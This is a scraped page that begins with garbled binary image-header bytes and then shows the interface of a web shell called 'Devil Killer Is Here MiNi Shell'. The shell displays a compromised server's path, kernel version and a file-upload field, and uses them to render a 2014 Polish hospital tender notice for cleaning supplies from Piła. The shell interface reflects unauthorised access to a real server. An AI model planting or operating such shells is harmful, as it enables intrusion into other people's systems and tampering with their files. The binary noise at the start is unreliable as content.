JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140205/41342-N-2014.html

<p class="kh_header"><b>Piła: Dostawa środków czystości</b><br>
<b>Numer ogłoszenia: 41342 - 2014; data zamieszczenia: 05.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Pile , ul. Rydygiera 1, 64-920 Piła, woj. wielkopolskie, tel. 067 2106207, faks (067) 212 40 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1.	 Przedmiotem zamówienia jest dostawa środków do utrzymania czystości w Szpitalu Specjalistycznym w Pile w następującym asortymencie:
a)	Zadanie 1 - Mydło toaletowe w kostkach oraz pasta bhp do mycia rąk,
b)	Zadanie 2 - Ręczniki papierowe do rąk w rolce, papier toaletowy w rolkach,
c)	Zadanie 3 - Ręczniki papierowe do rąk,
d)	Zadanie 4 - Pasty i proszki myjące,
e)	Zadanie 5 - Środki czyszczące,
f)	Zadanie 6 - Środki czyszczące,
g)	Zadanie 7 - Artykuły do sprzątania w gospodarstwie domowym,
h)	Zadanie 8 - Preparaty piorące,
i)	Zadanie 9 - Środki do czyszczenia podłóg,
j)	Zadanie 10 - Środki czyszczące i polerujące,
k)	Zadanie 11 - Środki do czyszczenia podłóg,
l)	Zadanie 12 - Środki czyszczące i polerujące,
m)	Zadanie 13 - Środki czyszczące,
n)	Zadania 14 - Środki czyszczące,
o)	Zadanie 15 - Środki czyszczące,
p)	Zadanie 16 - Produkty do pielęgnacji skóry,
q)	Zadanie 17 - Artykuły do sprzątania w gospodarstwie domowym,
r)	Zadanie 18 - Pieluszki dla niemowląt, pieluchomajtki dla dorosłych,
s)	Zadanie 19 - Myjka rękawica typu manopla j. u.,
t)	Zadanie 20 - Jednorazowy worek na wymiociny,
u)	Zadanie 21 - Jednorazowa szczoteczka do rąk,
v)	Zadanie 22 - Papier toaletowy.
2.2. Wszystkie produkty objęte przedmiotem zamówienia muszą spełniać następujące wymagania:
a)	posiadają aktualne karty charakterystyki oraz opisy oferowanych produktów w języku polskim;
b)	produkty będące detergentami muszą być oznakowane zgodnie z Rozporządzeniem WE 648/2004 z późn. zm. i rady z 31.03.2004 r z późn. zm. w sprawie detergentów;
c)	produkty będące wyrobami aerozolowymi muszą być oznakowane zgodnie z Rozporządzeniem Ministra Gospodarki z 5.11.2009 r (Dz. U. z 2009r Nr 188 poz. 1460) w sprawie szczegółowych wymagań dla wyrobów aerozolowych;
d)	posiadają opakowania jednostkowe znakowane standardowymi etykietami, które powinny zawierać następujące informacje:
- nazwę, logo, adres producenta;
- opis przygotowania produktu do użycia i sposób jego stosowania;
- opis składu chemicznego;
- czas skutecznego działania w przypadku środków dezynfekcyjnych;
- sposób dozowania;
- informacje o środkach ostrożności, w postaci znaków graficznych;
- ilość i pojemność opakowania indywidualnego i zbiorczego;
- numer serii i date produkcji;
- okres przydatności do użycia;
- warunki magazynowania i przechowywania
2.3. Termin ważności dostarczonego towaru nie może być krótszy niż 6 miesięcy, licząc od daty odbioru zamówienia cząstkowego. 
2.4. Zamawiający może odmówić odbioru przedmiotu umowy lub jego części w przypadku, gdy będzie on w stanie niekompletnym, wadliwym bądź stan techniczny jego zewnętrznych opakowań lub opakowań zbiorczych będzie wskazywał na możliwość jego uszkodzenia.
2.5. Szczegółowy opis przedmiotu zamówienia jest zawarty w załączniku nr 2 do SIWZ.
2.6. Dostawa przedmiotu zamówienia odbywać się będzie do Magazynu Towarowego Szpitalnej Szpitala Specjalistycznego w Pile w godzinach jej pracy tj. od poniedziałku do piątku w godzinach pracy 730 do 1430 za wyjątkiem dni ustawowo wolnych od pracy własnym transportem lub za pośrednictwem firmy kurierskiej na własny koszt i ryzyko.
2.7. Zamawiający oczekuje przedmiotu zamówienia wysokiej jakości, niezawodnego, spełniającego wszystkie funkcje, zgodnie z ich przeznaczeniem i zapewniającego bezpieczeństwo pacjentom oraz personelowi medycznemu.
2.8. Nadto wymagane jest dołączenie do oferty materiałów informacyjnych producenta- oryginalne karty katalogowe o oferowanym wyrobie (nie wymagają odrębnego potwierdzenia cechy i własności, które są udokumentowane na etykiecie handlowej).
2.9. Jeśli w opisie przedmiotu zamówienia występują nazwy własne należy je traktować wyłącznie jako przykład wyrobu, który dokładnie odpowiada opisowi przedmiotu zamówienia; w każdym takim przypadku zamawiający dopuszcza możliwość złożenia oferty równoważnej, jednak pod warunkiem, że zaproponowany przez Wykonawcę wyrób równoważny będzie spełniał minimum wymogów tej samej klasy, jakiej oczekuje Zamawiający, tzn. będzie odpowiadał wymaganiom opisanym przez Zamawiającego w SIWZ. Asortyment zaproponowany jako równoważny nie może odbiegać jakością, standardem, parametrami technicznymi od założonych przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.15.00-2, 33.76.10.00-2, 33.77.12.00-7, 33.76.30.00-6, 39.81.30.00-4, 39.22.43.00-1, 39.83.10.00-6, 39.83.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie potwierdzające, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (na załączonym do niniejszej SIWZ formularzu - Załącznik nr 3 do SIWZ, stanowiącym integralna jej cześć).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie, że posiada wiedzę i doświadczenie (na załączonym do niniejszej SIWZ formularzu - Załącznik nr 3 do SIWZ, stanowiącym integralna jej część).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie, że dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia (na załączonym do niniejszej SIWZ formularzu - Załącznik nr 3 do SIWZ, stanowiącym integralna jej cześć).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie, że dysponuje osobami zdolnymi do wykonania zamówienia (na załączonym do niniejszej SIWZ formularzu - Załącznik nr 3 do SIWZ, stanowiącym integralna jej cześć).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (na załączonym do niniejszej SIWZ formularzu - Załącznik nr 3 do SIWZ, stanowiącym integralna jej część).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	materiały informacyjne uwiarygodniające podane informacje techniczne (katalogi, opisy, foldery, karta katalogowa produktu itp.).
2.	karty charakterystyki substancji niebezpiecznych (dla zadań: 4,5,6,8,9,10,11,12,13,14,15)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony załącznik nr 1 - formularz ofertowy,
2. Wypełniony załącznik nr 2 - formularz cenowy
3. Wypełniony załączniki nr 3 - oświadczenie z art. 22,
4. Wypełniony załącznik nr 4 - oświadczenie z art. 24,
5. Wypełniony załącznik nr 5 - oświadczenie o przynależności do grupy kapitałowej,
6. Wypełniony załącznik nr 6 - oświadczenie podmiotu trzeciego,
7. W przypadku, gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisane przez osoby do tego umocowane zgodnie z odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Pełnomocnictwo winno być złożone w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności z zastrzeżeniem ust. 2.
2. Niedopuszczalna jest zmiana postanowień niniejszej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z uwarunkowań zewnętrznych niezależnych od stron umowy, a zmiana jest nieistotna w stosunku do treści oferty.
3. Zamawiający dopuszcza możliwość zmiany zapisów umowy w następującym zakresie:
a)	zaproponowania przez Sprzedającego produktu zamiennego o parametrach tożsamych lub jakościowo lepszego, w szczególności w przypadku zaprzestania produkcji lub dystrybucji produktów będących przedmiotem dostawy, wycofania tych produktów z obrotu, w tym na podstawie decyzji właściwych władz, przy czym cena tego produktu nie może być wyższa niż cena oferowanego przedmiotu zamówienia
b)	zmiany numeru katalogowego produktu lub nazwy własnej produktu - przy zachowaniu jego parametrów
c)	zmiany sposobu konfekcjonowania;
d)	wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową.
e)	zmian wynikających z przekształceń własnościowych,
f)	zmian organizacyjno-technicznych, zmiany adresu, zmiany banku obsługującego Sprzedającego lub Kupującego
g)	zmiany terminu realizacji zamówienia w sytuacji, gdy zmiana ta wynika z przyczyn niezależnych od Sprzedającego,
h)	zmiany osób odpowiedzialnych za realizację umowy w przypadku zaistnienia okoliczności których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-pila.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Pile im. Stanisława Staszica 64-920 Piła, ul. Rydygiera 1, pok. D3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 09:30, miejsce: Szpital Specjalistyczny w Pile im. Stanisława Staszica 64-920 Piła, ul. Rydygiera 1, pok. D14 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mydła toaletowego w kostkach oraz pasty bhp do mycia rąk. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ręczników papierowych do rak w rolce oraz papieru toaletowego w rolkach. szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.76.10.00-2, 33.76.30.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ręczników papierowych do rąk. Szczegółowy opis przedmiotu zamówienia zawiaera załacznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.76.30.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Srodki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa past i proszków myjących. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.81.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości. Szczególwy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystosci. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Środki czystosci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa art. do sprzątania w gospodarstwie domowym. Szczegółowy opis przedmiotu zamówienia zawiara załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.43.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów piorących. Szczególowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków do czyszczenia podłóg. Szczegółwy opis przedmiotu zamówienia zawarty jest w załaczniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czyszczących i polerujących. Szczególwy opis przedmiotu zamówienia zawiara załącznik nr 2 do SIWZ.</p></li>
